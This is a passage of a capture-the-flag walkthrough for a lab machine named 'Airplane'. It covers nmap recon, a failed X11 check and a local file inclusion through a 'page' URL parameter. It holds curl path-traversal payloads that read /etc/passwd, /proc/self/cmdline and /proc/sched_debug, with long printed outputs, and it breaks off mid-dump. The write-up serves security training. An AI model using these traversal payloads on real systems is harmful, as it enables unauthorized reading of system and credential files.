Airplane
Are you ready to fly?
This work by Manav G Krishna is licensed under CC BY-NC 4.0 
Machine IP: 10.10.116.253
Nmap Scan:
nmap -p- -A -v --min-rate 100 -oN airplane_thm -Pn 10.10.116.253
Nmap scan report for 10.10.116.253
Host is up (0.20s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b8:64:f7:a9:df:29:3a:b5:8a:58:ff:84:7c:1f:1a:b7 (RSA)
| 256 ad:61:3e:c7:10:32:aa:f1:f2:28:e2:de:cf:84:de:f0 (ECDSA)
|_ 256 a9:d8:49:aa:ee:de:c4:48:32:e4:f1:9e:2a:8a:67:f0 (ED25519)
6048/tcp open x11?
8000/tcp open http-alt Werkzeug/3.0.2 Python/3.8.10
|_http-server-header: Werkzeug/3.0.2 Python/3.8.10
|_http-title: Did not follow redirect to http://airplane.thm:8000/?page=index.html
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 NOT FOUND
| Server: Werkzeug/3.0.2 Python/3.8.10
| Date: Fri, 07 Jun 2024 18:35:44 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 207
| Connection: close
| <!doctype html>
| <html lang=en>
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.1 302 FOUND
| Server: Werkzeug/3.0.2 Python/3.8.10
| Date: Fri, 07 Jun 2024 18:35:39 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 269
| Location: http://airplane.thm:8000/?page=index.html
| Connection: close
| <!doctype html>
| <html lang=en>
| <title>Redirecting...</title>
| <h1>Redirecting...</h1>
| <p>You should be redirected automatically to the target URL: <a href="http://airplane.thm:8000/?page=index.html">http://airplane.thm:8000/?page=index.html</a>. If not, click the link.
| Socks5:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request syntax ('
| ').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.94SVN%I=7%D=6/8%Time=666352F6%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,1F3,"HTTP/1\.1\x20302\x20FOUND\r\nServer:\x20Werkzeug/3\.0\.
SF:2\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2007\x20Jun\x202024\x2018:35:39\
SF:x20GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Lengt
SF:h:\x20269\r\nLocation:\x20http://airplane\.thm:8000/\?page=index\.html\
SF:r\nConnection:\x20close\r\n\r\n<!doctype\x20html>\n<html\x20lang=en>\n<
SF:title>Redirecting\.\.\.</title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\x20
SF:should\x20be\x20redirected\x20automatically\x20to\x20the\x20target\x20U
SF:RL:\x20<a\x20href=\"http://airplane\.thm:8000/\?page=index\.html\">http
SF:://airplane\.thm:8000/\?page=index\.html</a>\.\x20If\x20not,\x20click\x
SF:20the\x20link\.\n")%r(FourOhFourRequest,184,"HTTP/1\.1\x20404\x20NOT\x2
SF:0FOUND\r\nServer:\x20Werkzeug/3\.0\.2\x20Python/3\.8\.10\r\nDate:\x20Fr
SF:i,\x2007\x20Jun\x202024\x2018:35:44\x20GMT\r\nContent-Type:\x20text/htm
SF:l;\x20charset=utf-8\r\nContent-Length:\x20207\r\nConnection:\x20close\r
SF:\n\r\n<!doctype\x20html>\n<html\x20lang=en>\n<title>404\x20Not\x20Found
SF:</title>\n<h1>Not\x20Found</h1>\n<p>The\x20requested\x20URL\x20was\x20n
SF:ot\x20found\x20on\x20the\x20server\.\x20If\x20you\x20entered\x20the\x20
SF:URL\x20manually\x20please\x20check\x20your\x20spelling\x20and\x20try\x2
SF:0again\.</p>\n")%r(Socks5,213,"<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C/
SF:/DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x20\x20\"http://w
SF:ww\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x20\x20<head>\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20c
SF:ontent=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<t
SF:itle>Error\x20response</title>\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x
SF:20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20response</h1>\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p>\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20request\x20syntax\x20\('\\x
SF:05\\x04\\x00\\x01\\x02\\x80\\x05\\x01\\x00\\x03'\)\.</p>\n\x20\x20\x20\
SF:x20\x20\x20\x20\x20<p>Error\x20code\x20explanation:\x20HTTPStatus\.BAD_
SF:REQUEST\x20-\x20Bad\x20request\x20syntax\x20or\x20unsupported\x20method
SF:\.</p>\n\x20\x20\x20\x20</body>\n</html>\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=6/8%OT=22%CT=1%CU=32666%PV=Y%DS=2%DC=T%G=Y%TM=66635
OS:3B0%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)S
OS:EQ(SP=102%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=102%GCD=5%ISR=109%TI=
OS:Z%CI=Z%II=I%TS=A)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M5
OS:08ST11NW7%O5=M508ST11NW7%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3
OS:%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF
OS:=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=
OS:Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%
OS:RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
OS:IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 17.468 days (since Tue May 21 12:54:49 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 160.98 ms 10.11.0.1
2 161.10 ms 10.10.116.253From the scan, we can see ports 22, 6048, and 8000 open and also there is a domain named airplane.thm which can be seen in the http-title part.
Hosts file entry: echo '10.10.116.253 airplane.thm' | sudo tee -a /etc/hosts
Checking out port 6048:
The Nmap Scan says that the service running on this port might be x11. It is not certain as it gives a question mark (x11?). Let us now check out resources to pentest this service anyways.
Ports 6000-6063 is where we typically find the x11 service:
SpeedGuide also mentions: Known Unauthorized Use on port 6003.
Pentesting X11:
HackTricks mentions that we could check if we can connect anonymously to the x11 port. From the information that we got from SpeedGuide, only port 6003 has been identified as being susceptible to unauthorized access, but in our case x11 might be running on port 6048, but we can still try to check for anonymous connection via the scanner auxiliary module present in Metasploit to see what we get.
This shows we can't connect anonymously to the port 6048. This is pretty much a dead end now. HackTricks didn't have anything else that was worth testing out for x11.
Now we can look at port 8000.
Checking out port 8000:
From the Nmap Scan we can see that server running on this port is a Python web server utilizing Werkzeug.
We can do some directory busting:
Command:
dirsearch -u http://airplane.thm:8000 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100
There is a path named /airplane. Checking it out:
Nothing interesting here.
Upon browsing http://airplane.thm:8000 we are redirected to http://airplane.thm:8000/?page=index.html.
There is a parameter in the URL named page (?page=) and the first thing that comes to mind is LFI (Local File Inclusion).
We can now try to traverse/climb the directory tree to fetch files such as /etc/passwd etc. and doing it via the terminal would be a lot more easier:
Command:
curl --output - http://airplane.thm:8000/\?page\=../../../../etc/passwdroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
fwupd-refresh:x:122:127:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
geoclue:x:123:128::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:124:129:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:126:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
sssd:x:127:132:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
carlos:x:1000:1000:carlos,,,:/home/carlos:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
hudson:x:1001:1001::/home/hudson:/bin/bash
sshd:x:128:65534::/run/sshd:/usr/sbin/nologinWe indeed have successful LFI.
From the /etc/passwd file contents we have two users other than root having a console, that is hudson and carlos. Trying to fetch the ssh private key (id_rsa) of these users, the user.txt flag etc. didn't yield any results.
Now let us try to fetch some files from the /proc file system (It provides detailed information about kernel, processes, and configuration parameters in a structured manner under the /proc directory):
/proc/self/cmdline: It is a file that contains the command line arguments that were used to start the current process.
Command:
curl --output - http://airplane.thm:8000/\?page\=../../../../proc/self/cmdline
It outputs: /usr/bin/python3app.py. This shows that, the current process that is running is app.py.
We can now try to fetch the app.py file:
Command:
curl --output - http://airplane.thm:8000/\?page\=../app.py
There is nothing of interest in here.
/proc/sched_debug: It is a file that can be used to retrieve running processes. It provides information about the state of the Linux scheduler.
Command:
curl --output - http://airplane.thm:8000/\?page\=../../../../proc/sched_debugSched Debug Version: v0.11, 5.4.0-139-generic #156-Ubuntu
ktime : 643026.363157
sched_clk : 643036.796476
cpu_clk : 643029.398816
jiffies : 4295053041Wewe
sched_clock_stable() : 1
sysctl_sched
.sysctl_sched_latency : 12.000000
.sysctl_sched_min_granularity : 1.500000
.sysctl_sched_wakeup_granularity : 2.000000
.sysctl_sched_child_runs_first : 0
.sysctl_sched_features : 2042683
.sysctl_sched_tunable_scaling : 1 (logarithmic)
cpu#0, 2499.998 MHz
.nr_running : 1
.nr_switches : 145394
.nr_load_updates : 0
.nr_uninterruptible : -15
.next_balance : 4295.053041
.curr->pid : 1191
.clock : 643028.641740
.clock_task : 643028.641740
.avg_idle : 893338
.max_idle_balance_cost : 500000
cfs_rq[0]:/autogroup-103
.exec_clock : 0.000000
.MIN_vruntime : 0.000001
.min_vruntime : 4.659338
.max_vruntime : 0.000001
.spread : 0.000000
.spread0 : -15767.298259
.nr_spread_over : 0
.nr_running : 0
.load : 0
.runnable_weight : 0
.load_avg : 0
.runnable_load_avg : 0
.util_avg : 0
.util_est_enqueued : 0
.removed.load_avg : 0
.removed.util_avg : 0
.removed.runnable_sum : 0
.tg_load_avg_contrib : 0
.tg_load_avg : 0
.throttled : 0
.throttle_count : 0
.se->exec_start : 642576.238699
.se->vruntime : 15766.000671
.se->sum_exec_runtime : 2.423764
.se->load.weight : 2
.se->runnable_weight : 2
.se->avg.load_avg : 0
.se->avg.util_avg : 0
.se->avg.runnable_load_avg : 0
cfs_rq[0]:/autogroup-75
.exec_clock : 0.000000
.MIN_vruntime : 0.000001
.min_vruntime : 118.480460
.max_vruntime : 0.000001
.spread : 0.000000
.spread0 : -15653.477137
.nr_spread_over : 0
.nr_running : 1
.load : 1048576
.runnable_weight : 1048576
.load_avg : 1024
.runnable_load_avg : 1024
.util_avg : 512
.util_est_enqueued : 0
.removed.load_avg : 0
.removed.util_avg : 0
.removed.runnable_sum : 0
.tg_load_avg_contrib : 1024
.tg_load_avg : 1024
.throttled : 0
.throttle_count : 0
.se->exec_start : 643028.641740
.se->vruntime : 15766.092635
.se->sum_exec_runtime : 117.283029
.se->load.weight : 1048576
.se->runnable_weight : 1048576
.se->avg.load_avg : 1020
.se->avg.util_avg : 512
.se->avg.runnable_load_avg : 1020
cfs_rq[0]:/
.exec_clock : 0.000000
.MIN_vruntime : 0.000001
.min_vruntime : 15771.957597
.max_vruntime : 0.000001
.spread : 0.000000
.spread0 : 0.000000
.nr_spread_over : 0
.nr_running : 1
.load : 1048576
.runnable_weight : 1048576
.load_avg : 1020
.runnable_load_avg : 1020
.util_avg : 512
.util_est_enqueued : 513
.removed.load_avg : 0
.removed.util_avg : 0
.removed.runnable_sum : 0
.tg_load_avg_contrib : 0
.tg_load_avg : 0
.throttled : 0
.throttle_count : 0
rt_rq[0]:
.rt_nr_running : 0
.rt_nr_migratory : 0
.rt_throttled : 0
.rt_time : 0.000000
.rt_runtime : 950.000000
dl_rq[0]:
.dl_nr_running : 0
.dl_nr_migratory : 0
.dl_bw->bw : 996147
.dl_bw->total_bw : 0
runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-----------------------------------------------------------------------------------------------------------
I rcu_gp 3 7.951420 2 100 0.000000 0.000000 0.000000 0 0 /
I rcu_par_gp 4 9.951419 2 100 0.000000 0.000000 0.000000 0 0 /
I kworker/0:0H 6 576.469184 4 100 0.000000 0.032862 0.000000 0 0 /
I kworker/u4:0 7 13329.010579 455 120 0.000000 16.805936 0.000000 0 0 /
I mm_percpu_wq 8 16.019073 2 100 0.000000 0.000000 0.000000 0 0 /
S ksoftirqd/0 9 15656.083264 845 120 0.000000 198.588077 0.000000 0 0 /
S migration/0 11 22.019070 248 0 0.000000 3.600801 0.000000 0 0 /
S idle_inject/0 12 0.000000 3 49 0.000000 0.000000 0.000000 0 0 /
I kworker/0:1 13 10173.535527 1044 120 0.000000 42.520695 0.000000 0 0 /
S cpuhp/0 14 775.339778 11 120 0.000000 0.282868 0.000000 0 0 /
S oom_reaper 27 49.019055 2 120 0.000000 0.000000 0.000000 0 0 /
I writeback 28 49.019055 2 100 0.000000 0.000000 0.000000 0 0 /
S ksmd 30 51.019053 2 125 0.000000 0.000000 0.000000 0 0 /
I kintegrityd 77 57.914847 2 100 0.000000 0.000000 0.000000 0 0 /
I blkcg_punt_bio 79 57.914847 2 100 0.000000 0.000000 0.000000 0 0 /
I ata_sff 81 58.058834 2 100 0.000000 0.000000 0.000000 0 0 /
I edac-poller 83 58.064044 2 100 0.000000 0.000000 0.000000 0 0 /
S watchdogd 85 5.999997 2 0 0.000000 0.000000 0.000000 0 0 /
Iacpi_thermal_pm 92 81.546320 2 100 0.000000 0.023792 0.000000 0 0 /
Ivfio-irqfd-clea 93 87.560759 2 100 0.000000 0.016218 0.000000 0 0 /
I kstrp 103 144.308544 2 100 0.000000 0.014149 0.000000 0 0 /
Icharger_manager 120 231.333397 2 100 0.000000 0.013072 0.000000 0 0 /
I kworker/u4:2 159 15765.985416 314 120 0.000000 10.876708 0.000000 0 0 /
Iext4-rsv-conver 182 520.732899 2 100 0.000000 0.013890 0.000000 0 0 /
I kworker/0:1H 195 15745.578681 241 100 0.000000 2.020911 0.000000 0 0 /
I kworker/0:3 251 15766.674391 2325 120 0.000000 54.519100 0.000000 0 0 /
S systemd-udevd 262 926.247795 2705 120 0.000000 1656.840932 0.000000 0 0 /autogroup-22
S loop0 263 2048.701580 7 100 0.000000 0.081773 0.000000 0 0 /
S loop2 266 5234.758513 77 100 0.000000 1.051606 0.000000 0 0 /
S loop3 267 9515.960645 160 100 0.000000 9.817005 0.000000 0 0 /
S loop5 269 5234.758504 95 100 0.000000 1.580124 0.000000 0 0 /
Ssystemd-timesyn 299 98.458179 92 120 0.000000 105.387526 0.000000 0 0 /autogroup-30
S sd-resolve 305 96.548621 14 120 0.000000 2.602234 0.000000 0 0 /autogroup-30
Ssystemd-resolve 303 18.153143 158 120 0.000000 120.435021 0.000000 0 0 /autogroup-32
I cryptd 332 2135.784467 2 100 0.000000 0.008300 0.000000 0 0 /
Saccounts-daemon 365 24.110079 150 120 0.000000 20.448992 0.000000 0 0 /autogroup-35
S gmain 429 31.329159 755 120 0.000000 24.976210 0.000000 0 0 /autogroup-35
S cron 372 3.278111 23 120 0.000000 5.197933 0.000000 0 0 /autogroup-40
S dbus-daemon 375 379.576173 6230 120 0.000000 834.752015 0.000000 0 0 /autogroup-42
S gmain 523 30.900772 159 120 0.000000 10.431751 0.000000 0 0 /autogroup-43
S gdbus 524 29.116567 382 120 0.000000 15.058144 0.000000 0 0 /autogroup-43
S polkitd 386 49.614823 875 120 0.000000 100.095068 0.000000 0 0 /autogroup-52
S gdbus 483 47.320322 771 120 0.000000 41.827413 0.000000 0 0 /autogroup-52
S in:imuxsock 457 18.486386 627 120 0.000000 22.737789 0.000000 0 0 /autogroup-50
S in:imklog 458 9.602643 6 120 0.000000 1.505662 0.000000 0 0 /autogroup-50
S rs:main Q:Reg 459 18.495937 625 120 0.000000 18.856878 0.000000 0 0 /autogroup-50
S snapd 469 3990.714680 38856 120 0.000000 469.086145 0.000000 0 0 /autogroup-55
S snapd 487 3996.608242 8362 120 0.000000 2499.630735 0.000000 0 0 /autogroup-55
S snapd 576 3652.070784 239 120 0.000000 46.222254 0.000000 0 0 /autogroup-55
S snapd 577 3995.582998 7363 120 0.000000 2153.509279 0.000000 0 0 /autogroup-55
S snapd 1006 504.738523 1 120 0.000000 0.084869 0.000000 0 0 /autogroup-55
S udisksd 396 41.598891 184 120 0.000000 48.330841 0.000000 0 0 /autogroup-56
S gmain 462 8.175916 4 120 0.000000 0.057962 0.000000 0 0 /autogroup-56
S cleanup 551 43.422422 7 120 0.000000 0.383982 0.000000 0 0 /autogroup-56
S wpa_supplicant 399 6.871813 105 120 0.000000 10.243871 0.000000 0 0 /autogroup-58
S avahi-daemon 433 4.484454 3 120 0.000000 0.150552 0.000000 0 0 /autogroup-38
S ModemManager 518 21.042328 175 120 0.000000 56.427785 0.000000 0 0 /autogroup-70
S gmain 540 11.660073 2 120 0.000000 0.054628 0.000000 0 0 /autogroup-70
S gdbus 562 21.893807 55 120 0.000000 5.296438 0.000000 0 0 /autogroup-70
S gdbserver 529 4.507783 28 120 0.000000 6.645510 0.000000 0 0 /autogroup-74
>R python3 1191 118.480460 1 120 0.000000 0.135038 0.000000 0 0 /autogroup-75
Samazon-ssm-agen 600 47.293914 757 120 0.000000 10.483550 0.000000 0 0 /autogroup-81
Samazon-ssm-agen 622 53.251912 481 120 0.000000 39.873305 0.000000 0 0 /autogroup-81
S whoopsie 557 12.093363 48 120 0.000000 14.585748 0.000000 0 0 /autogroup-84
S gdbus 573 13.844009 32 120 0.000000 3.465150 0.000000 0 0 /autogroup-84
S gdm3 644 68.782791 114 120 0.000000 23.860067 0.000000 0 0 /autogroup-95
S gdbus 657 68.887483 192 120 0.000000 9.339251 0.000000 0 0 /autogroup-95
S rtkit-daemon 680 4.659338 140 120 0.000000 4.085816 0.000000 0 0 /autogroup-103
S gdbus 714 54.991941 101 120 0.000000 4.974203 0.000000 0 0 /autogroup-95
S agetty 721 -2.984186 10 120 0.000000 4.314288 0.000000 0 0 /autogroup-107
S gdm-x-session 727 128.878531 32 120 0.000000 8.796583 0.000000 0 0 /autogroup-105
S gmain 730 127.187166 5 120 0.000000 0.121225 0.000000 0 0 /autogroup-105
S gdbus 738 127.014022 18 120 0.000000 1.231093 0.000000 0 0 /autogroup-105
S Xorg 731 2382.425366 3045 120 0.000000 530.953060 0.000000 0 0 /autogroup-105
Sdbus-run-sessio 740 136.445403 3 120 0.000000 1.505559 0.000000 0 0 /autogroup-105
S gmain 763 1171.332031 3 120 0.000000 0.236895 0.000000 0 0 /autogroup-105
S dconf worker 767 374.877242 18 120 0.000000 0.963325 0.000000 0 0 /autogroup-105
S dbus-daemon 750 1667.093292 115 120 0.000000 10.709076 0.000000 0 0 /autogroup-105
S gmain 785 2382.579937 163 120 0.000000 10.590783 0.000000 0 0 /autogroup-105
S dconf worker 788 945.627200 93 120 0.000000 3.917499 0.000000 0 0 /autogroup-105
S llvmpipe-0 790 2384.422537 614 120 0.000000 678.281802 0.000000 0 0 /autogroup-105
S JS Helper 795 2380.681540 147 120 0.000000 23.264097 0.000000 0 0 /autogroup-105
S JS Helper 796 2380.808932 144 120 0.000000 64.400907 0.000000 0 0 /autogroup-105
S ibus-daemon 811 1134.738527 75 120 0.000000 18.346020 0.000000 0 0 /autogroup-105
S gdbus 815 1134.883646 54 120 0.000000 5.684664 0.000000 0 0 /autogroup-105
S ibus-dconf 814 852.512278 16 120 0.000000 12.829576 0.000000 0 0 /autogroup-105
S gdbus 822 858.078513 12 120 0.000000 0.533468 0.000000 0 0 /autogroup-105
S dconf worker 823 858.740608 9 120 0.000000 0.371751 0.000000 0 0 /autogroup-105
S gmain 824 864.855220 2 120 0.000000 0.067120 0.000000 0 0 /autogroup-105
S ibus-portal 821 1115.854232 64 120 0.000000 7.063153 0.000000 0 0 /autogroup-105
S gdbus 831 1115.943688 67 120 0.000000 6.369954 0.000000 0 0 /autogroup-105
Sat-spi2-registr 827 2341.918442 105 120 0.000000 10.427788 0.000000 0 0 /autogroup-105
S gmain 835 905.419600 2 120 0.000000 0.027222 0.000000 0 0 /autogroup-105
S upowerd 840 27.640840 85 120 0.000000 53.843959 0.000000 0 0 /autogroup-109
S gmain 847 20.399457 4 120 0.000000 0.051108 0.000000 0 0 /autogroup-109
S gdbus 848 27.257413 51 120 0.000000 4.424208 0.000000 0 0 /autogroup-109
S gjs 859 1613.882310 38 120 0.000000 61.601311 0.000000 0 0 /autogroup-105
S gsd-sharing 868 1150.038231 61 120 0.000000 13.210878 0.000000 0 0 /autogroup-105
S dconf worker 908 1611.470649 12 120 0.000000 0.384460 0.000000 0 0 /autogroup-105
S gdbus 912 1150.112028 60 120 0.000000 5.190680 0.000000 0 0 /autogroup-105
S gmain 944 1226.627349 2 120 0.000000 0.046870 0.000000 0 0 /autogroup-105
S dconf worker 945 1611.456645 14 120 0.000000 0.381226 0.000000 0 0 /autogroup-105
S dconf worker 929 1611.451191 25 120 0.000000 0.739001 0.000000 0 0 /autogroup-105
S gmain 900 1072.678199 1 120 0.000000 0.039722 0.000000 0 0 /autogroup-105
S gsd-rfkill 874 1150.036648 76 120 0.000000 9.602307 0.000000 0 0 /autogroup-105
S gmain 894 1072.340516 1 120 0.000000 0.047320 0.000000 0 0 /autogroup-105
S gdbus 895 1150.106270 94 120 0.000000 5.513711 0.000000 0 0 /autogroup-105
S gsd-smartcard 875 1150.039898 84 120 0.000000 12.542825 0.000000 0 0 /autogroup-105
S gdbus 896 1150.112908 53 120 0.000000 3.900217 0.000000 0 0 /autogroup-105
S gsd-datetime 876 1150.039972 66 120 0.000000 27.151397 0.000000 0 0 /autogroup-105
S gmain 936 1094.571083 2 120 0.000000 0.063303 0.000000 0 0 /autogroup-105
S gdbus 946 1150.108422 56 120 0.000000 2.230710 0.000000 0 0 /autogroup-105
S gmain 937 1096.782583 2 120 0.000000 0.059144 0.000000 0 0 /autogroup-105
S gdbus 940 1678.019534 118 120 0.000000 8.326697 0.000000 0 0 /autogroup-105
S gmain 891 1072.833040 1 120 0.000000 0.039843 0.000000 0 0 /autogroup-105
Sgsd-a11y-settin 884 1150.037197 53 120 0.000000 7.799463 0.000000 0 0 /autogroup-105
S gdbus 890 1150.148199 38 120 0.000000 3.211692 0.000000 0 0 /autogroup-105
S dconf worker 925 1082.330483 10 120 0.000000 0.258995 0.000000 0 0 /autogroup-105
Sgsd-housekeepin 887 2381.590662 95 120 0.000000 16.010553 0.000000 0 0 /autogroup-105
S gmain 898 1073.276581 3 120 0.000000 0.983385 0.000000 0 0 /autogroup-105
S gmain 931 1084.337674 1 120 0.000000 0.051395 0.000000 0 0 /autogroup-105
S gsd-printer 924 1677.905455 65 120 0.000000 19.022057 0.000000 0 0 /autogroup-105
S gdbus 962 1677.984285 68 120 0.000000 2.247328 0.000000 0 0 /autogroup-105
Sibus-engine-sim 941 1108.325927 52 120 0.000000 6.467079 0.000000 0 0 /autogroup-105
S gmain 963 1110.591027 1 120 0.000000 0.035722 0.000000 0 0 /autogroup-105
S gdbus 964 1111.343121 30 120 0.000000 0.877817 0.000000 0 0 /autogroup-105
S colord 965 54.009186 183 120 0.000000 120.477768 0.000000 0 0 /autogroup-114
S gdbus 974 30.252733 142 120 0.000000 7.066562 0.000000 0 0 /autogroup-114
S sleep 1189 558.153193 3 120 0.000000 0.485092 0.000000 0 0 /autogroup-36
cpu#1, 2499.998 MHz
.nr_running : 0
.nr_switches : 141989
.nr_load_updates : 0
.nr_uninterruptible : 15
.next_balance : 4295.053017
.curr->pid : 0
.clock : 643028.517425
.clock_task : 643028.517425
.avg_idle : 775367
.max_idle_balance_cost : 500000
cfs_rq[1]:/autogroup-75
.exec_clock : 0.000000
.MIN_vruntime : 0.000001
.min_vruntime : 200.684759
.max_vruntime : 0.000001
.spread : 0.000000
.spread0 : -15571.272838
.nr_spread_over : 0
.nr_running : 0
.load : 0
.runnable_weight : 0
.load_avg : 0
.runnable_load_avg : 0
.util_avg : 0
.util_est_enqueued : 0
.removed.load_avg : 0
.removed.util_avg : 0
.removed.runnable_sum : 0
.tg_load_avg_contrib : 0
.tg_load_avg : 1024
.throttled : 0
.throttle_count : 0
.se->exec_start : 643028.517425
.se->vruntime : 17527.430112
.se->sum_exec_runtime : 192.481980
.se->load.weight : 2
.se->runnable_weight : 2
.se->avg.load_avg : 0
.se->avg.util_avg : 0
.se->avg.runnable_load_avg : 0
cfs_rq[1]:/
.exec_clock : 0.000000
.MIN_vruntime : 0.000001
.min_vruntime : 17531.774936
.max_vruntime : 0.000001
.spread : 0.000000
.spread0 : 1759.817339
.nr_spread_over : 0
.nr_running : 0
.load : 0
.runnable_weight : 0
.load_avg : 0
.runnable_load_avg : 0
.util_avg : 0
.util_est_enqueued : 0
.removed.load_avg : 0
.removed.util_avg : 0
.removed.runnable_sum : 0
.tg_load_avg_contrib : 0
.tg_load_avg : 0
.throttled : 0
.throttle_count : 0
rt_rq[1]:
.rt_nr_running : 0
.rt_nr_migratory : 0
.rt_throttled : 0
.rt_time : 0.025151
